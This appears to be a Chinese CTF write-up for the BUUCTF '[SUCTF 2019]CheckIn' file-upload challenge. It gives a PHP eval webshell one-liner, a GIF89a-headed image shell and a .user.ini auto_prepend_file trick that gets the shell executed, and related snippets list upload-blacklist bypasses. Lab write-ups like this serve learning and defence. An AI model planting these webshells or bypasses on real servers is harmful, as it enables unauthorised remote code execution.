buuctf-web-[SUCTF 2019]CheckIn-wp

最新推荐文章于 2024-02-29 11:00:00 发布
最新推荐文章于 2024-02-29 11:00:00 发布
阅读量324 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/119079132
版权

[SUCTF 2019]CheckIn

知识点

  • 图片马制作 copy 01.jpg/a + 02.php/b test.jpg

  • .user.ini的上传 GIF89a(如果需要的话) auto_prepend_file=test.jpg

过程

主页是一个上传页面

上传.php,提示非法后缀

尝试将.php后缀改成.jpg,提示过滤了<?

正常上传图片,上传成功

修改请求体中的一句话木马内容为

<script language="php">eval($_GET['cmd']);</script>

上传后,页面返回提示

搜罗资料

exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)

exif_imagetype — 判断一个图像的类型

说明
exif_imagetype ( string $filename ) : int

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

这个函数就是检查文件头,直接制作图片马

成功上传,但是此时还无法执行PHP脚本,接着我们可以上传一个user.ini的文件(经过测试,没有过滤该后缀),我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell,关于该文件详见:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

然后我们去上传,文件名为.user.ini

GIF89a
auto_prepend_file=test.jpg

蚁剑连接即可

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Readfree-Checkiner:一个简单的http签入脚本
05-12
Readfree-Checkiner 一个简单的脚本可以基于Python 3来检入 。 一个用于。基于Python 3。 用法 ... 该脚本将生成一个cookie文件。 下次运行脚本时,可以使用cookie继续登录。... 如果您打算更改登录帐户,请同时删除...
genshin-mys-checkin:【蚊子的腿也是腿】原神米游社每日签到,原神微博超话签到,领取礼包,自动推送
03-08
genshin-mys-checkin 每天早上7:00〜7:10随机时间签到 部分失败不会使整体流程终止,和你会收到消息来自GitHub的Actions失败提醒邮件 运行前会自动同步主仓库,并使用主仓库文件解决冲突,如有自定义需求请自行修改...
上传验证绕过——服务端黑名单绕过
Williamanddog的博客
01-28 868
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。由于.htaccess还是没有过滤,可以重写文件解析规则绕过,上传一个 .htaccess,文件内容如下,意思。Upload-labs(Pass-03)根据源码可以看出,只是做了个简单的后缀名黑名单,识别上传文件的类型是。否为 '.asp','.aspx','.php','.jsp' 中的一个,若是其中的一个,则不允许上传。这一关的思路是它没有循环验证,也就是说这些首尾去空,删除末尾的点,去除字符串:$SDATA,转换。
绕过黑名单验证
白菜执笔人的博客
03-05 3247
Web安全攻防 学习笔记 一、绕过黑名单验证(基本都用到 BurpSuite) 1.1、基于文件后缀名验证         对于文件上传模块来说,尽量避免上传可执行的脚本文件。为了防止上传脚本需要设置对应的验证 方式。最简单的就是设置文件后缀名验证。 验证方式的分类 (1)基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。 (2)基于黑名单...
《小迪安全》第21天 文件上传:后端黑白名单绕过
m0_56250796的博客
11-07 273
首先作者先判断我们用POST方式提交(标签名为submit)的变量是否存在,如果存在,则接下来判断upload这个文件夹是否存在,如果存在则继续判断我们上传文件的文件类型,如果其文件类型为image/jpeg或者为image/png或者为image/gif,那么让temp_file这个变量获取存储在服务器中文件的临时名称,然后让img_path这个变量为upload+/+被上传文件的名称。如果在上传文件的后缀名里面加上空格,匹配到的含空格的字符串就在黑名单之外,就可以成功进行上传。
047-WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过
最新发布
wushangyu32335的博客
02-29 1128
小迪安全2023笔记
21:WEB漏洞-文件上传之后端黑白名单绕过
mingyqf的博客
01-05 1892
21:WEB漏洞-文件上传之后端黑白名单绕过 知识点 文件上传常见验证:后缀名,类型,文件头等 1.后缀名:黑名单,白名单 黑名单:明确不让上传的格式后缀,比如asp,php,jsp,aspx,cgi,war等,但是黑名单易被绕过,比如上传php5,Phtml等 白名单:明确可以上传的格式后缀,比如jpg,png,zip,rar,gif等,推荐白名单。 2.文件类型:MIME信息 content-type字段校验,可以通过抓包改包方式绕过 3.文件头:内容头信息 每种类型的文件都有自己固定的文件头
hence-flight-checkin
05-06
您必须先安装凉亭: npm install -g bower 然后,继续并方便地安装元素的依赖项: npm run install-deps可用的Gulp命令$ gulp将编译资产,通过实时重载为您的Web组件提供服务,转换es6,并在观察src文件的同时将js ...
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
42-qr-checkin:二维码签到
04-01
首尔42少年 $ git clone https://github.com/innovationacademy-kr/42-qr-checkin $ cd 42-qr-checkin $ npm install ... 打开Web浏览器并导航到以查看实际示例。 42 API清单 이문서의 Internet上发布。
第21篇:WEB漏洞~文件上传~后端黑白名单绕过
廖一语山的博客
08-21 1130
借鉴https://blog.csdn.net/weixin_47598409/article/details/115050869
网络安全笔记--文件上传1(文件上传基础、常见后端验证、黑名单、白名单、后端绕过方式)
swy66的博客
08-17 3473
文件上传相关知识基础,白名单绕过、黑名单绕过
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3784
文件上传绕过总结;编辑器文件上传;渗透测试记录
【文件上传】绕过总结
weixin_55205599的博客
07-02 2716
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上传.jpg,不允许上传.php,如何绕过传.php一句话木马呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",没有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单没有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
文件上传漏洞(一)之黑名单检测绕过
一醉一休的博客
02-28 4821
一.文件上传漏洞之黑名单过滤不全  准备上传一句话PHP文件,用burp抓包之后,去修改上传文件的后缀名,依次去尝试,对于黑名单策略(限制某一些文件格式),我们可以上传类似可以解析的文件,绕过黑名单,而其他可作为php脚本执行的其他后缀格式有php4,php5,phtml 二.(.htaccess文件绕过) 概况来说,.htaccess文件时Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现网页301重定向,自
文件上传之后端黑白名单绕过
qq_27862405的博客
05-27 2185
文件上传常见验证: 后缀名:类型,文件头等 后缀名:黑名单,白名单 #黑名单:明确不让上传的格式后缀(asp,php,jsp,aspx,cgi,war) 黑名单验证利用代码编写漏洞尝试绕过,比如后缀名加.jpg.php,抓包加空格,大小写后缀名,循环验证与一次验证单次验证只去除一个字符,可以通过添加多个干扰字符实现绕过等。 #白名单:明确可以上传的格式后缀(jpg,png,zip,rar,gif) 白名单上传可以使用干扰字符绕过,具体看搭建环境版本以及类型 主流都是使用白名单验证 文件类
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单
niqiu320的博客
04-27 2973
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单 脚本语言 绕过方式 asp .php/.php5/.php4/.php3/.php2/php1/.html/.htm/.phtml/.pHp/.pHp5/.pHp4/.pHp3/.pHp2/.pHp1/.Html/.Htm/.pHtml php .jsp/.jspa/.jspx/.jsw/.jsv/.jspf/.jtml/.jSp/.jSpx/.jSpa/.jSw/.jSv/.jSpf/.jHtml jsp .asp/.as
文件上传绕过
qq_45557130的博客
10-13 4217
文件上传绕过
第21天-WEB漏洞-文件上传之后端黑白名单绕过
MCTSOG的博客
03-05 1826
思维导图 文件上传常见验证 后缀名,类型,文件头等 黑名单:明确不允许上传的格式后缀 如:$deny_ext = array(’.asp’,’.aspx’,’.php’,’.jsp’); 不允许上传后缀为asp, aspx ,php ,jsp 的文件 白名单:明确只允许上传的格式后缀 如:$ext_arr = array(‘jpg’,‘png’,‘gif’); 只允许上传jpg png gif 文件 文件类型:MIME 信息 MIME(Multipurpose Internet Mail Extens
学生宿舍管理系统--需求说明、概要设计、详细设计
06-09
好的,我会为你解答这个问题,以下是学生宿舍管理系统的需求说明、概要设计、详细设计。 1. 需求说明 学生宿舍管理系统是一种帮助学校管理学生宿舍的软件系统。该系统应该能够实现以下功能: - 学生入住:将学生信息录入系统,包括姓名、学号、性别、班级、联系电话等信息,分配宿舍。 - 宿舍管理:管理宿舍信息,包括宿舍编号、宿舍类型、床位数量等,管理宿舍入住情况。 - 入住管理:实现学生入住、退宿、换宿等操作,保证宿舍床位的合理利用。 - 维修管理:记录宿舍报修情况,及时安排维修工作。 - 费用管理:管理宿舍费用,包括水电费、网络费等。 - 统计分析:提供各种报表和统计数据,包括宿舍入住率、费用支出等。 2. 概要设计 学生宿舍管理系统的概要设计包括以下模块: - 学生信息管理模块:实现学生信息的录入、修改和查询功能。 - 宿舍信息管理模块:实现宿舍信息的录入、修改和查询功能。 - 入住管理模块:实现学生入住、退宿、换宿等操作。 - 维修管理模块:实现宿舍报修、维修情况记录、维修进度查询等功能。 - 费用管理模块:管理宿舍费用,包括水电费、网络费等。 - 统计分析模块:提供各种报表和统计数据,包括宿舍入住率、费用支出等。 3. 详细设计 以下是学生宿舍管理系统的详细设计: 3.1 数据库设计 - 学生表(Student):包括学生编号、姓名、性别、班级、联系电话等字段。 - 宿舍表(Dormitory):包括宿舍编号、宿舍类型、床位数量等字段。 - 入住表(CheckIn):包括学生编号、宿舍编号、入住时间等字段。 - 报修表(Repair):包括宿舍编号、报修时间、维修人员等字段。 - 费用表(Expense):包括宿舍编号、费用类型、费用金额等字段。 3.2 界面设计 - 登录界面:实现用户登录和注册功能。 - 学生信息管理界面:实现学生信息的录入、修改和查询功能。 - 宿舍信息管理界面:实现宿舍信息的录入、修改和查询功能。 - 入住管理界面:实现学生入住、退宿、换宿等操作。 - 维修管理界面:实现宿舍报修、维修情况记录、维修进度查询等功能。 - 费用管理界面:管理宿舍费用,包括水电费、网络费等。 - 统计分析界面:提供各种报表和统计数据,包括宿舍入住率、费用支出等。 以上就是学生宿舍管理系统的需求说明、概要设计、详细设计。希望能对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值